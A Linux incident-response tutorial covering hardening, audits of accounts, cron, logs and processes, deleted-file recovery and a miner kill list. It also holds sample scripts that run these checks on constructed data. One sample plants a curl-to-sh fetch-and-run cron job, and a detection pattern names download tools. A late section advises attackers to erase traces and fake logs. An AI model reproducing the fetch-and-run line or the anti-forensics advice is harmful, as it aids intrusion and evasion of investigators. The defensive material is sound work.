Linux Security Response
TyeYeah Lv4

Security response is a good entry point for mastering Linux commands, because it involves many commands for user management, privilege control and task monitoring that are useful in everyday Linux work.

Linux Reinforce

$ chattr +a xxx --append-only: can be appended to but not truncated or deleted (useful for logs)
$ chattr +i xxx --immutable: cannot be modified, deleted or renamed, even by root, until chattr -i
$ touch /etc/nologin --normal users cannot log in while this file exists (root still can)
$ vi /etc/ssh/sshd_config -> Banner none --show no pre-login banner (the SSH version string is still sent)
$ authconfig --passalgo=sha512 --update --RHEL/CentOS: hash passwords with SHA-512 instead of MD5
# one line in /etc/pam.d/sshd or system-auth (PAM config, not a shell command):
auth required pam_tally2.so deny=3 unlock_time=5 even_deny_root root_unlock_time=120 --lock after 3 failed logins; unlock after 5 s (120 s for root); both values are seconds
# pam_tally2 was dropped in Linux-PAM 1.5 (RHEL 8+, recent Debian/Ubuntu); use pam_faillock with the same deny/unlock_time options there
$ vi /etc/profile -> HISTSIZE=5 HISTFILESIZE=20 --keep only a short shell history (this also hides what an attacker typed; for forensics you want it large)

Security Response

  • PDCERF: Preparation, Detection, Containment, Eradication, Recovery, Follow-up
  • Confirm the attack time and source IP address first, and the malicious file (process or rootkit) last

check suspicious users

# search privileged users (UID 0); the awk form is exact, the grep form also matches GID 0 and other fields
$ awk -F: '$3==0{print $1}' /etc/passwd
$ grep :0 /etc/passwd
# search users that actually have a password hash ($1$ = MD5, $5$ = SHA-256, $6$ = SHA-512, $y$ = yescrypt); "*", "!" and "!!" mean locked or unset
$ awk -F: '$2 ~ /^\$/{print $1}' /etc/shadow
# search users with sudo privilege (also check /etc/sudoers.d/*; ALL=(ALL:ALL) is the Debian form)
$ grep -v "^#\|^$" /etc/sudoers | grep "ALL=(ALL"
# disable or delete users
$ usermod -L user    # lock the password; SSH keys still work, so also set the shell to nologin
$ userdel user       # delete user
$ userdel -r user    # delete user and his home dir

# check new users (a planted account is usually the newest, i.e. the highest UID, or a second UID 0)
$ less /etc/passwd
# check last modification time
$ ls -l /etc/passwd /etc/shadow /etc/group
$ stat /etc/passwd
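The account checks above as functions, an added example that is not part of the original post. They take file paths rather than assuming /etc, so the same code runs on the live files and on a copy pulled from a compromised host; write_samples creates constructed passwd/shadow/sudoers files (the user names, hashes and the "toor" backdoor account are made up for the demo) so it can be dry-run anywhere.

```shell
#!/bin/sh
# Added example, not from the original post. Account audit helpers that
# mirror the one-liners above but are exact about what they match.

uid0_users() {                # every account with UID 0, not just "root"
    awk -F: '$3 == 0 {print $1}' "$1"
}

password_users() {            # accounts whose shadow field is a real hash
    # "*", "!", "!!" and "" mean locked or unset; a hash starts with "$"
    awk -F: '$2 ~ /^\$/ {print $1}' "$1"
}

shell_users() {               # accounts with an interactive login shell
    awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ {print $1}' "$1"
}

sudo_users() {                # sudoers entries granting ALL (root) rights
    grep -Ev '^[[:space:]]*(#|$)' "$1" \
        | grep -E 'ALL[[:space:]]*=[[:space:]]*\(ALL(:ALL)?\)' \
        | awk '{print $1}'
}

rogue_uid0() {                # UID-0 accounts other than root that have a password
    # both lists contain unique names, so a name seen twice is in both sets
    { uid0_users "$1" | grep -vx root || true; password_users "$2"; } | sort | uniq -d
}

write_samples() {             # constructed sample files, not real host data
    d=$1
    cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
toor:x:0:0::/root:/bin/bash
EOF
    cat > "$d/shadow" <<'EOF'
root:$6$rounds=5000$saltsalt$hashhash:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
www-data:*:18000:0:99999:7:::
alice:$6$saltsalt$hashhash:18000:0:99999:7:::
toor:$1$salt$hash:18000:0:99999:7:::
EOF
    cat > "$d/sudoers" <<'EOF'
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
alice   ALL=(ALL) NOPASSWD: ALL
#includedir /etc/sudoers.d
EOF
}

audit_accounts() {            # usage: audit_accounts /etc   (or a copied tree)
    d=$1
    echo "== UID 0 accounts";                     uid0_users "$d/passwd"
    echo "== accounts with a password hash";      password_users "$d/shadow"
    echo "== accounts with a login shell";        shell_users "$d/passwd"
    echo "== sudo grants (also read $d/sudoers.d/*)"; sudo_users "$d/sudoers"
    echo "== rogue UID 0 accounts with a password"; rogue_uid0 "$d/passwd" "$d/shadow"
}

tmp=$(mktemp -d) && write_samples "$tmp" && audit_accounts "$tmp"
rm -rf "$tmp"
```

On a live host call audit_accounts /etc; the "rogue UID 0" list is the one to act on first, and sudoers.d still has to be read by hand because sudo_users only sees the main file.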

port and process

# netstat shows port/socket info
# ps shows process info
# lsof maps processes to the files and sockets they hold
$ netstat -antlp | more
$ netstat -pantu | grep port
$ ps auxf | grep pid
$ ps -fp pid
$ lsof -i | grep port
$ lsof -i :port
$ lsof -p pid

# ss replaces netstat on newer systems; fuser also maps a port to its process
$ ss -t | grep port
$ ss -pantul
$ sudo apt install psmisc # provides fuser
$ sudo fuser -v port/protocol # like 80/tcp

startup item and timed tasks

$ more /etc/rc.local
$ ls /etc/rc.d/rc[0-6].d      # SysV runlevel links (scripts live in /etc/init.d)

$ crontab -l # list the current user's cron jobs (add -u user for another account)
$ crontab -e # edit
$ crontab -r # remove
/var/spool/cron/user   default per-user crontab file (/var/spool/cron/crontabs/user on Debian)

suspicious dirs:
/var/spool/cron/*
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/*
/etc/anacrontab
/var/spool/anacron/*

used to be (SysV):
$ chkconfig --list
$ chkconfig --level 2345 httpd on/off
now is (systemd):
$ systemctl list-unit-files
$ systemctl list-unit-files --state=enabled
$ systemctl enable httpd
$ systemctl disable httpd
# unit files you did not install, under /etc/systemd/system or ~/.config/systemd/user, are the systemd equivalent of a rogue cron entry
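The cron locations listed above, walked by a script: an added example, not part of the original post. It takes an optional root directory so it runs against a mounted image as well as the live system, prints every active (non-comment) line with the file it came from, flags lines with common download-and-execute or scratch-directory indicators, and lists files changed in the last 24 hours. make_sample_tree builds a constructed tree with two planted jobs (the file names and the 198.51.100.7 address are made up for the demo).

```shell
#!/bin/sh
# Added example, not from the original post. Cron/anacron/rc.local
# persistence sweep; $1 is an optional root prefix (default: live system).

CRON_PATHS='/etc/crontab /etc/anacrontab /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly /var/spool/cron /var/spool/anacron /etc/rc.local'

cron_entries() {           # "<file>: <line>" for every active line under the paths
    root=${1:-}
    for p in $CRON_PATHS; do
        [ -e "$root$p" ] || continue
        find "$root$p" -type f | while read -r f; do
            grep -Ev '^[[:space:]]*(#|$)' "$f" | sed "s|^|${f#$root}: |"
        done
    done
    return 0
}

suspicious_entries() {     # entries that fetch and run code, or run from scratch dirs
    cron_entries "$1" | grep -E 'curl|wget|base64|/tmp/|/dev/shm/|/var/tmp/'
}

recently_changed() {       # files under the cron paths modified in the last N minutes (default 24 h)
    root=${1:-}; mins=${2:-1440}
    for p in $CRON_PATHS; do
        [ -e "$root$p" ] && find "$root$p" -type f -mmin "-$mins"
    done
    return 0
}

make_sample_tree() {       # constructed sample tree, not real host data
    d=$1
    mkdir -p "$d/etc/cron.d" "$d/etc/cron.hourly" "$d/var/spool/cron"
    cat > "$d/etc/crontab" <<'EOF'
SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
EOF
    printf '30 7 * * * root test -x /etc/init.d/anacron && /usr/sbin/invoke-rc.d anacron start\n' > "$d/etc/cron.d/0anacron"
    # planted: a per-user crontab that pulls a script every 5 minutes
    printf '*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh > /dev/null 2>&1\n' > "$d/var/spool/cron/root"
    # planted: a hidden hourly script starting a binary from /dev/shm
    printf '#!/bin/sh\n/dev/shm/.x/kworkerds &\n' > "$d/etc/cron.hourly/.update"
}

tmp=$(mktemp -d) && make_sample_tree "$tmp"
echo "== all entries";          cron_entries "$tmp"
echo "== suspicious entries";   suspicious_entries "$tmp"
echo "== changed in last 24 h"; recently_changed "$tmp"
rm -rf "$tmp"
```

On a live host run cron_entries with no argument; the indicator list in suspicious_entries is deliberately short, so read the full list too, since a job that only calls a renamed binary in /usr/bin will not trip it.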

log check

# locate the IP that brute-forced the root password:
$ journalctl -xa | grep "Failed password for root" | awk '{print $11}' | sort | uniq -c | sort -nr | more

# similar to above, but extracts the IPv4 address wherever it sits (the awk field shifts on "invalid user" lines); uniq -c only counts adjacent lines, so sort first:
$ journalctl -xa | grep "Failed password" | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" | sort | uniq -c | sort -nr

# the attacker's dictionary, i.e. the user names that were tried:
$ grep "Failed password" /var/log/secure | perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}' | sort | uniq -c | sort -nr

# source IPs of successful logins:
$ grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

# similar to above: date, user and source IP of each successful login
$ grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

As you can see, both the log file (/var/log/secure on RHEL/CentOS, /var/log/auth.log on Debian/Ubuntu) and the journal ("journalctl -xa", or "journalctl -u sshd" for sshd alone) can be used to check logs.

  • add user log e.g.
    Jul 10 00:12:15 localhost useradd[2382]: new group: name=user, GID=1001
    Jul 10 00:12:15 localhost useradd[2382]: new user: name=user, UID=1001, GID=1001, home=/home/user, shell=/bin/bash
    Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for user
    # grep "useradd" /var/log/auth.log
  • delete user log e.g.
    Jul 10 00:14:17 localhost userdel[2393]: delete user 'user'
    Jul 10 00:14:17 localhost userdel[2393]: removed group 'user' owned by 'user'
    Jul 10 00:14:17 localhost userdel[2393]: removed shadow group 'user' owned by 'user'
    # grep "userdel" /var/log/auth.log
  • su switch user log e.g.
    Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)
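The log one-liners above as shell functions, an added example that is not part of the original post. They find the source address by pattern instead of by awk field number (the field shifts on "invalid user" lines), and add one check the one-liners do not make: which addresses failed repeatedly and then got an "Accepted", which is a brute force that worked. sample_log writes constructed sshd lines in the /var/log/secure format using RFC 5737 test addresses; the user names and PIDs are made up.

```shell
#!/bin/sh
# Added example, not from the original post. sshd auth-log triage; every
# function takes the log file path as $1.

failed_by_ip() {           # failed attempts per source IP, busiest first
    grep -a 'Failed password' "$1" \
        | grep -Eo 'from ([0-9]{1,3}\.){3}[0-9]{1,3}' \
        | cut -d' ' -f2 | sort | uniq -c | sort -rn
}

tried_users() {            # user names the attacker tried, invalid users included
    grep -a 'Failed password' "$1" \
        | sed -En 's/.*Failed password for (invalid user )?([^ ]+) from .*/\2/p' \
        | sort | uniq -c | sort -rn
}

accepted_logins() {        # "ip user method timestamp" for every successful login
    grep -a 'Accepted ' "$1" \
        | sed -En 's/^([A-Z][a-z]{2} +[0-9]+ [0-9:]+) .*Accepted ([a-z]+) for ([^ ]+) from ([0-9.]+) .*/\4 \3 \2 \1/p'
}

failed_then_accepted() {   # IPs that failed and later succeeded
    # both inputs are de-duplicated, so an IP printed twice is in both sets
    { failed_by_ip "$1" | awk '{print $2}'
      accepted_logins "$1" | awk '{print $1}' | sort -u; } | sort | uniq -d
}

sample_log() {             # constructed sample lines, not from a real host
    cat <<'EOF'
Jul 10 00:10:01 localhost sshd[2300]: Failed password for root from 198.51.100.7 port 40110 ssh2
Jul 10 00:10:03 localhost sshd[2301]: Failed password for invalid user admin from 198.51.100.7 port 40112 ssh2
Jul 10 00:10:05 localhost sshd[2302]: Failed password for root from 198.51.100.7 port 40114 ssh2
Jul 10 00:10:09 localhost sshd[2303]: Accepted password for root from 198.51.100.7 port 40118 ssh2
Jul 10 00:12:40 localhost sshd[2310]: Failed password for invalid user oracle from 203.0.113.9 port 51000 ssh2
Jul 10 00:15:00 localhost sshd[2320]: Accepted publickey for deploy from 192.0.2.25 port 60000 ssh2
EOF
}

report() {                 # usage: report /var/log/secure   (defaults to the sample)
    log=${1:-}
    if [ -z "$log" ]; then log=$(mktemp); sample_log > "$log"; fi
    echo "== failed attempts by IP";     failed_by_ip "$log"
    echo "== user names tried";          tried_users "$log"
    echo "== successful logins";         accepted_logins "$log"
    echo "== failed, then accepted (!)"; failed_then_accepted "$log"
}

report "$@"
```

For journald hosts feed it a dump instead: journalctl -u sshd --no-pager > sshd.log; report sshd.log. The "failed, then accepted" list is the first thing to pull the session details for, because a password that was guessed is also the attacker's foothold for the rest of the timeline.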

view hidden processes

$ ps -eo pid= | sort -n | uniq > tasklist1.txt
$ ls /proc | grep -E '^[0-9]+$' | sort -n | uniq > tasklist2.txt
$ diff tasklist1.txt tasklist2.txt
# PIDs present in /proc but missing from ps are hidden by a rootkit or a replaced ps binary; expect a little noise from processes that started or exited between the two commands

Commands Summary

Files Recovery

If an important file was deleted while a process that opened it is still alive, the data is still on disk: the kernel only frees the inode when the last open descriptor is closed, so the file can still be read (and written) through that process's file descriptor.

e.g.

  • look at /var/log/secure, only to find it was deleted
  • use "lsof" to see which process still has it open (deleted files are marked "(deleted)" in the lsof output)
  • as we can see, the pid is 1264 and the fd (file descriptor) is 4, so the content is reachable as /proc/1264/fd/4
  • use I/O redirection to copy it from /proc/1264/fd/4 back into a file, before the process exits
  • look at /var/log/secure again: the deleted file is recovered
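The recovery described above, scripted end to end as an added example that is not part of the original post. It builds its own victim file (one constructed log line), hands an open descriptor to a helper process, deletes the file, then locates the descriptor under /proc exactly as lsof would and copies the data back. It is Linux-only because it relies on /proc, and the "process that still has the file open" is a plain sleep.

```shell
#!/bin/sh
# Added example, not from the original post. Recover a deleted file that
# a live process still holds open, via /proc/<pid>/fd/<n>.

recover_open_deleted() {
    dir=$(mktemp -d)
    victim="$dir/secure"
    # constructed content standing in for /var/log/secure
    printf 'Jul 10 00:12:15 localhost sshd[1264]: Accepted password for root from 192.0.2.10 port 50022 ssh2\n' > "$victim"

    # Open the file on fd 3, start a long-lived child (it inherits fd 3),
    # then close our own copy: the child is now the only holder of the inode.
    exec 3<"$victim"
    sleep 60 >/dev/null 2>&1 &
    holder=$!
    exec 3<&-

    rm -f "$victim"          # directory entry gone; data blocks are not freed yet

    # What "lsof -p $holder" shows: a descriptor whose target ends in "(deleted)".
    fd=
    for link in /proc/"$holder"/fd/*; do
        if [ "$(readlink "$link" 2>/dev/null)" = "$victim (deleted)" ]; then
            fd=${link##*/}
            break
        fi
    done
    if [ -z "$fd" ]; then
        kill "$holder" 2>/dev/null || true
        rm -rf "$dir"
        return 1
    fi

    # The I/O-redirection step: read the still-open inode into a new file.
    cat "/proc/$holder/fd/$fd" > "$dir/secure.recovered"

    kill "$holder" 2>/dev/null || true
    wait "$holder" 2>/dev/null || true
    cat "$dir/secure.recovered"      # the recovered content
    rm -rf "$dir"
}

recover_open_deleted
```

Against a real host, replace the helper with the pid and fd number that lsof reports; the copy must finish before that process exits, since the inode disappears with its last descriptor.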

Tools

ext3grep recovers files deleted with rm -rf on an ext3 file system.
First unmount (or remount read-only) that disk to stop further writes from overwriting the freed blocks, then install ext3grep. It is in the apt repo, or you can compile it yourself.

Installation:

$ apt install e2fslibs-dev
$ tar xvf ext3grep-0.10.1.tar.gz
$ cd ext3grep-0.10.1
$ ./configure && make && make install

Scan file names:

$ ext3grep /dev/sdbx --dump-names

And recover all:

$ ext3grep /dev/sdbx --restore-all

Or recover a single file (the path is relative to the file system root, with no leading slash):

$ ext3grep /dev/sdbx --restore-file var/lib/mysql/aqsh/tb_b_attench.MYD

Another tool is extundelete (ext3 and ext4); you can install it through apt or get it from SourceForge.

Installation:

$ wget http://nchc.dl.sourceforge.net/project/extundelete/extundelete/0.2.4/extundelete-0.2.4.tar.bz2
$ apt install e2fsprogs e2fslibs-dev build-essential
$ tar -jxvf extundelete-0.2.4.tar.bz2
$ cd extundelete-0.2.4
$ ./configure --prefix=/usr/local/extundelete
$ make && make install
# check installation
$ cd /usr/local/extundelete/bin
$ ./extundelete -v

Its usage is similar to ext3grep; recovered files are written to RECOVERED_FILES/ in the current directory. It can also restore a whole directory, or only files deleted after a given time (a Unix timestamp, so the value depends on your timezone):

$ ./extundelete --restore-file var/lib/mysql/aqsh/tb_b_attench.MYD /dev/sdbx
$ ./extundelete --restore-all /dev/sdbx
$ date -d "May 7 18:40 2019" +%s
1557225600
$ ./extundelete --restore-all --after "1557225600" /dev/sdbx
# by directory
$ ./extundelete /dev/sdbx --restore-directory var/lib/mysql/aqsh

Useful Scripts

Normal

Fetch a statically linked busybox for analysis, so you have a known-good ls/ps/netstat when the system binaries may have been replaced by a rootkit:

$ cd /bin/
$ wget https://busybox.net/downloads/binaries/1.30.0-i686/busybox
$ chmod 755 busybox
# then run e.g. /bin/busybox ps or /bin/busybox ls /proc instead of the system ps/ls

show the processes and symbols burning the most CPU (miners stand out here)

$ perf top -s pid,comm,dso,symbol

delete DDoS trojans or mining scripts; this list can be run as-is (from a SRC event). Each line kills every process whose ps line matches the indicator, so check the match with ps auxf | grep first; kill -9 also leaves cron/rc persistence in place, so go back to the startup-item checks afterwards.

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9
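Before killing processes by name as the list above does, it pays to record what each one actually is; this added example, which is not part of the original post, does that from /proc. The executable link tells you the real binary and whether it was deleted after start (a common miner trick that ps does not show), and cwd, cmdline and parent PID go into the incident notes. hunt wraps it around pgrep and only kills when DRY_RUN is unset; the indicator patterns are whatever you pass in, it ships none of its own. Linux only.

```shell
#!/bin/sh
# Added example, not from the original post. Capture evidence about a PID
# from /proc, then optionally kill it.

proc_triage() {            # usage: proc_triage <pid>; prints one line of evidence
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such pid: $pid" >&2; return 1; }
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')
    cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')
    cmd=$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)
    ppid=$(awk '/^PPid:/ {print $2}' "/proc/$pid/status")
    printf 'pid=%s ppid=%s exe=%s cwd=%s cmd=%s\n' "$pid" "$ppid" "$exe" "$cwd" "$cmd"
    case $exe in
        *'(deleted)'*|/tmp/*|/dev/shm/*|/var/tmp/*)
            echo "  !! executable was deleted after start or lives in a scratch dir" ;;
    esac
    # the binary can still be copied out for analysis while the process lives:
    #   cp /proc/$pid/exe /root/evidence/$pid.bin
    return 0
}

hunt() {                   # usage: [DRY_RUN=1] hunt <pattern>   (pattern matched against full cmdline)
    pattern=$1
    for pid in $(pgrep -f -- "$pattern"); do
        proc_triage "$pid"
        [ "${DRY_RUN:-}" ] || kill -9 "$pid"
    done
    return 0
}

# demo on this shell's own PID, which is always present
proc_triage $$
```

Run the indicators from the list above through hunt with DRY_RUN=1 first; for anything it reports as deleted or running from /tmp or /dev/shm, copy /proc/<pid>/exe out before the kill, because the file is gone from disk once the process is.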

Operations related:

find zombie processes

$ ps -ef | grep defunct

count

# simply use top and read the Tasks line ...
Tasks: 4 total, 1 running, 3 sleeping, 0 stopped, 0 zombie
# or
$ ps -ef | grep defunct | grep -v grep | wc -l

kill zombie processes

A zombie is already dead, so kill -9 on its own PID does nothing. Signal its parent instead, so that it reaps the child (or, if the parent dies, init adopts and reaps it):
$ ps -eo ppid=,stat= | awk '$2 ~ /^Z/ {print $1}' | sort -u | xargs -r kill -HUP
$ kill -HUP `ps -A -o stat=,ppid= | grep -e '^[Zz]' | awk '{print $2}'`

Tide sec team’s auto script( in Chinese)

It is an automated script written in Python 2 and is useful in Linux security response.
It gathers system information and service logs, then writes the results to a log file.
The script can be found Here.

A miner cleaner

This was extracted from a mining trojan; it kills every competing miner on the victim.
Get it Here to clear mainstream mining trojans.

Clean your ass finally

After the attack, you had better clean up after yourself to be untraceable.
We have a simple cleaner Here. Another, better script is Here (in Chinese), which can even fake log entries.

Key Files

"Key" here means important

Use lsattr to see the extended attributes (the flags set with chattr; ls -l does not show them, which is why a +i backdoor survives rm)

  • lsattr options
    -a  show all files, including those whose names start with .
    -d  list directories themselves rather than their contents
    -l  print the flags with their long names
    -R  recurse into subdirectories
    -v  show the file version/generation number
    -V  show the lsattr version

Use getfacl to see the ACL (Access Control List) entries, which can grant access that the mode bits in ls -l do not show

  • getfacl options
    -a, --access: only display the file access control list
    -d, --default: only display the default access control list
    -c, --omit-header: do not display the comment header
    -e, --all-effective: print all effective rights
    -E, --no-effective: print no effective rights
    -s, --skip-base: skip files that only have the base entries
    -R, --recursive: recurse into subdirectories
    -L, --logical: logical walk (follow symbolic links)
    -P, --physical: physical walk (do not follow symbolic links)
    -t, --tabular: use tabular output format
    -n, --numeric: print numeric user/group identifiers
    -p, --absolute-names: do not strip the leading '/' from path names
    -v, --version: display version and exit
    -h, --help: display this help information
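An added example, not part of the original post, that turns the lsattr check into a sweep: it reads lsattr output (live, via lsattr -R, or from a saved listing) and reports every file carrying the immutable (i) or append-only (a) flag. Attackers set +i on planted binaries and crontabs so that rm and userdel fail, while an admin who followed the hardening section above will have +a on logs, so both appear and the reader sorts out which is which. sample_lsattr is a constructed listing; the /usr/bin/.sshd name is taken from the trojan list above, the rest is made up.

```shell
#!/bin/sh
# Added example, not from the original post. Flagged-file sweep built on
# lsattr output ("<flags> <path>", plus "<dir>:" headers under -R).

flagged_from_lsattr() {    # stdin: lsattr output; stdout: "immutable|append-only <path>"
    awk 'NF >= 2 && $1 ~ /^[-A-Za-z]+$/ {
        flags = $1; path = $0; sub(/^[^ ]+ +/, "", path)
        tag = ""
        if (index(flags, "i")) tag = tag "immutable "
        if (index(flags, "a")) tag = tag "append-only "
        if (tag != "") print tag path
    }'
}

flagged_files() {          # usage: flagged_files /etc /bin /usr/bin /var/spool/cron ...
    # errors from pseudo file systems that have no attributes are dropped
    lsattr -R "$@" 2>/dev/null | flagged_from_lsattr
}

sample_lsattr() {          # constructed listing, not from a real host
    cat <<'EOF'
--------------e------- /etc/passwd
----i---------e------- /usr/bin/.sshd
-----a--------e------- /var/log/wtmp
--------------e------- /etc/crontab

/etc/cron.d:
----i---------e------- /etc/cron.d/.x
EOF
}

sample_lsattr | flagged_from_lsattr
```

Run flagged_files over /etc, /bin, /sbin, /usr/bin, /usr/sbin, /lib and the cron directories; an immutable file you did not set yourself is the thing to clear with chattr -i before any cleanup, and it is also a good indicator of where the attacker's other files are.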

    Tools

  • chkrootkit
    later…
  • rkhunter
    later…
  • clamav
    later…